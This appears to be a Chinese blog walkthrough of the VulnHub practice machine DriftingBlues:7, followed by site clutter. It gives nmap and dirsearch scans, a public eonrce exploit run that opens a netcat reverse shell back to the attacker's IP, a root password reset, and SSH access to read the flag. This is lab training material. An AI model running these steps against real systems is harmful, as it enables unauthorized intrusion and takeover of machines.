vulnhub靶机 | DriftingBlues:7

大家好!
我是小黄,很高兴又跟大家见面啦 !
拒绝水文,从我做起 !!!!
未经允许,禁止转载 ,违者必究!!!!
本实验仅适用于学习和测试 ,严禁违法操作 ! ! !
今天更新的是:

  • vulnhub靶机 | DriftingBlues:7 靶机解题过程及思路
  • 微信公众号回复:【靶机】,即可获取本文全部涉及到的工具。

在这里插入图片描述


创建时间:2021年6月7日
软件: MindMaster Pro、kali、DriftingBlues:7靶机


DriftingBlues:7靶机解题过程及思路

前言:

在这里插入图片描述

  • 题目的目标是要夺到里面的flag

信息搜集:

  • 在信息收集阶段,我们需要尽量多的收集关于目标web应用的各种信息,
  • 比如:脚本语言的类型、服务器的类型、目录的结构、使用的开源软件、数据库类型、所有链接页面,用到的框架等。

  • 第一步:扫描当前网段中的存活主机发现目标主机
  • 指令模板:nmap -sP IP地址
nmap -sP 192.168.224.1/24 

-


  • 第二步:查看端口及上面运行的服务查看端口及服务
  • 指令模板:nmap -p- IP地址
nmap -p- 192.168.224.135 

在这里插入图片描述


  • 第三步:查看端口上面运行的服务版本查看端口上运行服务版本
  • 指令模板:nmap -sV IP地址
nmap -sV  192.168.224.135

在这里插入图片描述

  • 补充:常见端口及服务
  • 22端口:SSH服务端口,可能存在 弱口令暴利破解
  • 80端口:HTTP端口,有可能对应网站接口
  • 443端口:HTTPS端口
  • 3306端口:MySQL数据库端口,可能存在 弱口令暴利破解

漏洞发现以及漏洞利用:

  • 我们可以尝试访问一下66、80、443端口看看
  • 首先访问一下:66端口 ,因为是上面运行了SimpleHttpServer

在这里插入图片描述

python3 dirsearch.py -u http://192.168.224.135:66/  

在这里插入图片描述

  • 扫描出一个index_files文件夹,尝试进行访问

在这里插入图片描述

  • 但是里面并没有发现什么有价值的东西,然后就卡住了。
  • 换条路
    在这里插入图片描述

  • 访问80端口:发现里面有一个登录窗口??? 哇哦~

在这里插入图片描述

git clone https://github.com/h4knet/eonrce.git  

在这里插入图片描述

  • 需要先赋予运行权限
chmod +x eonrce.py

在这里插入图片描述

  • 在Kali 开启监听
  • 指令模板:nc -lvp 指定端口

在这里插入图片描述

  • 运行脚本:./eonrce.py https://192.168.224.135 -ip 192.168.224.129 -port 8888
  • 指令模板:./eonrce.py 连接URL -ip 指定本机IP -port 指定nc监听的端口

在这里插入图片描述

  • 我们修改root的密码passwd root
  • 由之前扫描发现开了ssh服务,我们用 ssh 连接靶机ssh 192.168.224.135

在这里插入图片描述

  • 查看root用户目录下的文件
  • 发现有个叫做flag.txt的文件,查看一下

在这里插入图片描述
在这里插入图片描述



  • 443端口就直接出个这???

在这里插入图片描述

  • 大体意思就是个这???

在这里插入图片描述

  • 这个是没啥用…

各位路过的朋友,如果觉得可以学到些什么的话,点个赞 再走吧,欢迎各位路过的大佬评论,指正错误,也欢迎有问题的小伙伴评论留言,私信。

每个小伙伴的关注都是本人更新博客的动力!!!
请微信搜索【 在下小黄 】文章更新将在第一时间阅读 !
在这里插入图片描述

博客中若有不恰当的地方,请您一定要告诉我。前路崎岖,望我们可以互相帮助,并肩前行!


  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 10
    评论
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

在下小黄

ღ给个赞 是对小黄最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值